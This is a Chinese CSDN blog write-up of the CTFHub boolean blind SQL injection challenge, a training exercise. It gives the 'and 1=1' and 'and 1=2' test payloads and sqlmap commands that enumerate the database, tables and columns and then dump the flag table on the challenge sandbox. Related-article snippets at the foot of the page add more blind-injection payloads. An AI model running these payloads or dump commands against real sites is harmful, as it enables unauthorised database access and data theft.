CTFHub | 布尔盲注

最新推荐文章于 2024-06-12 08:30:00 发布
最新推荐文章于 2024-06-12 08:30:00 发布
阅读量1.7k 收藏 2
点赞数 1
分类专栏: CTF精进之路 文章标签: web安全 CTF http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/127586336
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

布尔盲注:

        (无)

网页显示内容

        

        

0x02 解题过程

        根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。构造 payload 验证是否属于整数型注入,确定此题为整数型注入。使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。

        

根据网页显示内容输入1进行测试,发现此题可能存在SQL注入

        
在URL末尾使用'and 1=1'和'and 1=2'验证是否属于整数型注入

#payload
and 1 = 1
and 1 = 2

        

'and 1=1'语句正常执行,回显正常

and 1=1

        

'and 1=2'语句正常执行,回显出错,说明此题存在SQL整数型注入

and 1=2

        

使用sqlmap工具爆出数据库名和缓存页面数据,得到数据库名sqli

python3 sqlmap.py -u http://challenge-b7ba99b679c4cbfa.sandbox.ctfhub.com:10800/?id=1 --current-db

        

爆出刚才获得的数据库名sqli的表名,发现一个名为flag的表比较可疑

python3 sqlmap.py http://challenge-b7ba99b679c4cbfa.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

        

爆出flag表的字段

python3 sqlmap.py http://challenge-b7ba99b679c4cbfa.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

        

查看字段中的数据,发现此题flag

python3 sqlmap.py -u http://challenge-b7ba99b679c4cbfa.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump --batch

        

        

0x03 布尔盲注

布尔类型(Boolean type)

布尔类型只有两个值,True 和 False。通常用来判断条件是否成立。计算机里的一种数据类型,一般用于逻辑运算和比较运算。

        

盲注

盲注是指在SQL注入过程中,SQL语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

  • web页面返回True 或者 false,构造SQL语句,利用and,or,not等关键字

        

        

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
SQL注入之基于布尔盲注详解
09-10
在基于布尔盲注中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回不同的状态。例如,通过在URL中添加`id=2' and length(database())>1 %23`这样的参数,...
CTFHUB-布尔盲注
Web学习之路
03-24 1006
true 与 false
CTFhub布尔盲注
ndjnddjxn的博客
04-12 774
如果目标元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤(1)的操作。首先,从数组的中间元素开始搜索,如果该元素正好是目标元素,则搜索过程结束,否则执行下一步。),手工注入比较麻烦,一般使用工具sqlmap,burpsuite辅助,或者使用脚本。返回从下标为from截取长度为length的str子串。提高效率,枚举法,延时法写得脚本,运行出有时花的时间太长。参考高中数学的函数二分法求根,将数据库名切片,循环i次,i是字符下标。输入3,只回显对和错,确定是布尔盲注
CTFHUB-SQL注入-布尔盲注
最新发布
weixin_68416970的博客
06-12 609
布尔盲注是一种在SQL注入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL注入手法无法获得直接的错误信息,此时就需要使用布尔盲注来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
CTFHub-web(sql布尔盲注)
分享与记录
07-22 4179
文章目录手工注入sqlmap注入总结 手工注入 1. 题目直接说明了是布尔盲注,来简单验证一下 2. 既然如此,那么构造SQL语句,得到数据库长度 3. 数据库名称的长度为4,然后可以猜解出数据库的名称 得知当前数据库的第一个字母是s 然后依次得到数据库的第2个字母到第4个字母 最后对照ASCII表 得到当前数据库名称为sqli 4. 得到数据库中表的数量 前面只是演示如何得到数据库的名称 其实后面可以直接用database()来代替sqli 1 and (select count(t
ctfhub 布尔盲注
plant1234的博客
06-17 1541
布尔盲注: 布尔盲注: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schem
SQL注入:布尔盲注和时间盲注——CTFHUB 使用Burpsuite进行半自动注入
PigletTT的博客
07-10 2313
SQL注入:布尔盲注和时间盲注——CTFHUB为例 一、原理 1.布尔盲注布尔盲注一般在页面只会显示正确和错误两种显示,因此在这种情况下我们不知道如何去获取数据库的详细内容,包括当前所在的数据库,数据库里面的表以及每个表的字段和内容了。在这种情况下需要借助一些特别的函数来判断注入的语句是否正确,从而获取数据库的信息。以下函数是进行盲注时常用的函数 length(str) //返回str字符串的长度。 1 and length(database())=4 //判断数据库名字的长度是否为4
布尔盲注python脚本.zip
12-28
布尔盲注(Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类型的注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现...
ctfhub-sql布尔盲注
god_001的博客
06-01 653
打开网址,先输入: 得到:输入: 得到:看出可以布尔盲注查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
CTFHub布尔盲注(新的payload)
weixin_44732566的博客
02-23 5421
CTFHub 布尔盲注 题目已经表明是布尔盲注,发现没有闭合,也木有过滤,本来也是道基础题,但是发现回显不对头: payload:?id=1 and 's'='p' 回显是query_success 这道题和普通的布尔盲注不一样,一般布尔盲注(我做的也不多)是数据库查询结果为空或者查询语句报错,回显error。这道题是数据库查询为空,返回还是success,只有当查询语句报错时才返回erroe。 ...
CTFHUB-WEB-SQL注入-布尔盲注
weixin_49539962的博客
08-04 324
题目告诉我们了,这是个布尔盲注,就不需要一个个试验注入的方法了。接下来的解题思路应当是:首先通过折半查找的方法,通过界面的回显结果找出数据库名字的长度,并通过相同的方法依次找到数据库名字的每个字符、列名,然后再找到flag。自己手动一个个找当然可以,不过速度慢,写个脚本好了。有个工具叫sqlmap,用这个就不需要傻乎乎写脚本了。既然已知了数据库名字和列名,下面就在sqlmap上直接查flag吧(sqlmap实在是太慢了,陆陆续续续了40分钟)。找到数据库名还是叫sqli,估计列名里面有一个flag。
CTFHUB——SQL布尔盲注自动化脚本的实现
wuuconix's blog
08-27 1576
背景 很久以前做过布尔盲注的题目,但是当时用的是网上的代码,跑出来flag了也是一知半解,没有收获。 今天花了一下午的时间写了一个布尔盲注的脚本。 介绍 布尔盲注使用场景的特征十分明显,即界面不会给出查询的具体结果,也不会给你报错信息。而只会告诉你查询成功还是查询失败。 这就需要我们去利用一些神奇的函数比如substr,ascii,length来猜测。 猜测什么呢?首先猜测数据库的长度,知道了长度,就去猜数据库每个字符。知道了数据库,就去猜数据表的个数,表名长度,具体表名等等等等。也就是所有的一切都是你需要
Ctfhub - web -- SQL注入
m0_52920608的博客
01-28 3835
CTFHub sql注入 web mysql python脚本
基于python的布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 1817
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
CTFWeb各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 766
[WUSTCTF2020]颜值成绩查询(布尔注入)
ctfhub布尔盲注
08-31
布尔盲注是一种常用于渗透测试中的技术,用于检测和利用应用程序中的漏洞。在CTF比赛中,也经常会涉及到布尔盲注的题目。 布尔盲注是通过构造恶意的输入来判断应用程序是否存在漏洞。它的原理是利用应用程序对输入的处理方式,通过观察应用程序在不同输入情况下的响应,来推断出隐藏在后台数据库中的信息。 在CTFhub中,进行布尔盲注可以通过构造不同的查询语句来判断条件是否成立。以下是一个示例: 假设存在一个登录页面,我们需要猜测正确的用户名和密码。我们可以通过发送恶意输入来检测用户名是否正确。例如,我们可以构造如下的查询语句: `SELECT * FROM users WHERE username = 'admin' AND password LIKE 'a%'` 如果应用程序返回了正常的结果(例如登录成功),那么说明用户名是正确的。否则,我们可以根据返回结果判断用户名是否错误。 通过不断尝试不同的查询语句,我们可以逐步猜测出正确的用户名和密码,从而实现布尔盲注攻击。 需要注意的是,在进行布尔盲注时,需要谨慎处理恶意输入,避免对应用程序造成不必要的风险。同时,合法授权下进行渗透测试是合法的,未经授权的渗透测试则是违法行为。在进行CTF比赛或渗透测试时,请遵守相关法律法规和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值